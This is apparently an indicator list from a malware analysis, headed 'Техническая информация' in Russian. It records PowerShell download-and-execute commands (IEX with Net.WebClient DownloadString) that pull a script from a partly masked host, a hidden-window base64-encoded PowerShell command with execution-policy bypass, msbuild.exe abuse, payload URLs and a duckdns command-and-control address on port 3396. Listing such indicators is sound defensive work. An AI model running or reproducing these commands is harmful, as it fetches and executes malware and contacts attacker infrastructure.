Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://sp###mantra.biz/blyat.jpeg')
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- 'su#####at.duckdns.org':3396
- http://sp###mantra.biz/blyat.jpeg
- http://sp###mantra.biz/rnp.txt
- http://sp###mantra.biz/main.txt
- DNS ASK sp###mantra.biz
- DNS ASK su#####at.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://sp###mantra.biz/blyat.jpeg')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep Bypass -w 1 /e JABYAHcAIAA9ACAAJwBNAHUAZwBwAGoAcwBjAFcAQgAnADsACgAkAFAAcwBiAGIAWQBWAGwAYgBrACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'